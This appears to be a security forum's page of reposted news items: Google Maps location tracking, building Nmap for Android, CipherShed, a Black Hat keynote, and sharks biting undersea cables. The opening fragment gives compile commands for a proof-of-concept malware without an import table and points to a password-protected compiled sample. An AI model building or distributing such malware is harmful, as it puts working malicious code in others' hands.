RegCloseKey Result: Anyway, you can see entire source code here. To compile you need to run two commands: nasm -fwin32 IATLess.asm link /subsystem:windows /entry:start IATLess.obj No .data section: and no IAT entry: PEStudio screenshot: UPDATE: As requested, I uploaded compiled file here. Password: infected Sursa: https://www.codeandsec.com/PoC-Tiny-Malware-Without-IAT-DATA-Or-Resource-Section
  20. Yes, Google Maps is tracking you. Here's how to stop it VentureBeat Google is probably logging your location, step by step, via Google Maps. Want to see what kind of data it has on you? Check out Google’s own location history map, which lets you see the path you’ve traced for any given day that your smartphone has been running Google Maps. In the screenshot above, it shows some of my peregrinations around Paris in June of this year. This location history page has actually been available for several years, since Google first rolled it out as part of Latitude, its now-defunct location-sharing app. Cnet noticed it in December, 2013, TechCrunch picked it up a few days later, and now Junkee.com noticed it last week. We’re highlighting it again because it’s trivially easy to turn off Google Maps location-tracking, if you want to. In fact, I checked the location history page this morning and had difficulty finding any location data at all, because I’ve had location tracking turned off for months, with a few exceptions. To turn off location tracking, just follow these easy steps. How to delete your location history View your location history using Google’s web page. Set a time period to view — up to 30 days at a time. Select the period you want to delete. Click the “Delete history from this time period” link on the left side of this page. If you have multiple Google accounts, check the history for each one. To turn off location tracking in Android Go to the Settings app. Scroll down and tap on the Location section. Tap Google Location Reporting. Switch Location History to “off.” Note: For greater privacy, you can also turn off Location Reporting, but this will keep apps like Google Maps from working properly. How to turn off location tracking in iOS Open the Settings app. Scroll down to Privacy, and select Location Services. Disable all Location Services by setting the top slider to “off” — or scroll down to disable specific apps one by one, such as Google Maps. Take the steps above, and your location history will look something like mine does, below. For more details, check out this LifeHacker article: PSA: Your phone logs everywhere you go. Here’s how to turn it off. Hat tip: John Koetsier. Above: “You have no location history,” Google says — if you’ve refused to let it log your locations. Sursa: Yes, Google Maps is tracking you. Here's how to stop it - Prismatic
  21. Nmap 6.46 on Android August 17, 2014 I’ve just cross compiled Nmap 6.46 on Android since I did not do it for a while. If you just need binary, it’s here: http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2 If you need details, go here: https://secwiki.org/w/Nmap/Android Building Nmap from source (without SSL) If you want to build it from the source, process is pretty straightforward: git clone https://github.com/kost/nmap-android.git cd nmap-android cp -a android ~/src/nmap-6.46/ cd ~/src/nmap-6.46/android #(adjust paths if needed in Makefile) make doit Building Nmap from source (with OpenSSL) I see many people try to cross compile Nmap with OpenSSL support. Since, I did not specify OpenSSL part of cross compiling, I see there’s lot of complicated ways people do it. For example, like Gorjan Petrovski here: Umit project: Cross-compilation of a static Nmap with OpenSSL for Android In short, compiling of whole Android tree is not necessary. You just need to use same compiler for everything. I’m assuming you have NDK installed and standalone toolchain in PATH. For building zlib, I’m using following snippet: export CCARCH=arm-linux-androideabi CC="${CCARCH}-gcc" ./configure --prefix=/sdcard/opt/zlib-1.2.8 make make install For building OpenSSL, I’m using following snippet: export CCARCH=arm-linux-androideabi ./Configure dist --prefix=/sdcard/opt/openssl-1.0.1i make CC="${CCARCH}-gcc" AR="${CCARCH}-ar r" RANLIB="${CCARCH}-ranlib" LDFLAGS="-static" make install For building Nmap, I’m using following snippet: git clone https://github.com/kost/nmap-android.git cd nmap-android cp -a android ~/src/nmap-6.46/ cd ~/src/nmap-6.46/android #(YOU have to EDIT makefile to adjust NDK and OpenSSL paths) make havendk Note: If you plan to compile OpenSSL support, you need to edit Makefile before issuing make havendk in order to specify OpenSSL path. You should have binaries in place after build. You can strip them and transfer to your Android device. Sursa: Nmap 6.46 on Android | k0st
  22. [h=2]Cybersecurity as Realpolitik[/h] Power exists to be used. Some wish for cyber safety, which they will not get. Others wish for cyber order, which they will not get. Some have the eye to discern cyber policies that are "the least worst thing;" may they fill the vacuum of wishful thinking. Keynote Transcript ... Link: https://www.blackhat.com/us-14/archives.html
  23. CipherShed CipherShed on OSX CipherShed is free (as in free-of-charge and free-speech) encryption software for keeping your data secure and private. It started as a fork of the now-discontinued TrueCrypt Project. Learn more about how CipherShed works and the project behind it. CipherShed is cross-platform; It will be available for Windows, Mac OS and GNU/Linux. The CipherShed project is open-source, meaning the program source code is available for anyone to view. We encourage everyone to examine and audit our code, as well as encourage new ideas and improvements. We have several methods of communication for anyone to ask questions, get support, and become involved in the project. For more detailed information about the project, including contributing code and building from source, please visit our technical wiki. Link: https://ciphershed.org/
  24. [h=1]The Global Internet Is Being Attacked by Sharks, Google Confirms[/h] By Will Oremus Sharks' attraction to undersea fiber-optic cables has been well-documented over the years. Screenshot / YouTube The Internet is a series of tubes ... that are sometimes attacked by sharks. Reports of sharks biting the undersea cables that zip our data around the world date to at least 1987. That’s when the New York Times reported that “sharks have shown an inexplicable taste for the new fiber-optic cables that are being strung along the ocean floor linking the United States, Europe, and Japan.” Now it seems Google is biting back. According to Network World’s Brandon Butler, a Google product manager explained at a recent event that the company has taken to wrapping its trans-Pacific underwater cables in Kevlar to guard against shark bites. Google confirmed to me that its newest generation of undersea cables comes wrapped in special protective yarn and steel wire armor—and that the goal is to protect against cable cuts, including possible shark attacks. Here's an old video of what that looks like, in case you were wondering: To digress for a moment, it’s not clear that the coating Google is using is actually Kevlar, per se. A little searching on Google’s own handy website reveals that the company actually holds a patent of its own for a material called “polyethylene protective yarn.” It makes sense that Google would be investing in better ways to protect transoceanic data cables. Over the years there have been several instances in which damage to undersea lines resulted in widespread disruptions of Internet service. Dependable network infrastructure has become increasingly essential to Google’s business, which relies on ultra-fast transmissions of information between its data centers around the world. On Monday, Google infrastructure czar Urs Holzle announced that the company is helping to build a new trans-Pacific cable system connecting the United States to Japan at speeds of up to 60 Tbps. “That’s about 10 million times faster than your cable modem,” Holzle noted. Google’s partners on the project include China Mobile and SingTel. Why are sharks attracted to undersea data cables? Unclear. Several outlets have pointed out that sharks can sense electromagnetic fields, so perhaps they’re attracted by the current. Alternatively, a shark expert from Cal State-Long Beach suggested to Wired, they may just be curious. Anyone with a dual expertise in chondrichthyan behavior and electrical engineering is warmly invited to offer a more compelling explanation in the comments below. Regardless, it’s clear their powerful bites can cause real problems. Popular Science dredged up a 2009 UN Environmental Program report that includes the following rather convincing background information: Fish, including sharks, have a long history of biting cables as identified from teeth embedded in cable sheathings. Barracuda, shallow- and deep-water sharks and others have been identified as causes of cable failure. Bites tend to penetrate the cable insulation, allowing the power conductor to ground with seawater. Forget Google vs. Apple, Google vs. Amazon, and Google vs. Facebook. My new favorite tech rivalry is Google vs. shark. Sursa: Shark attacks threaten Google's undersea Internet cables. (Video)
×
×
  • Create New...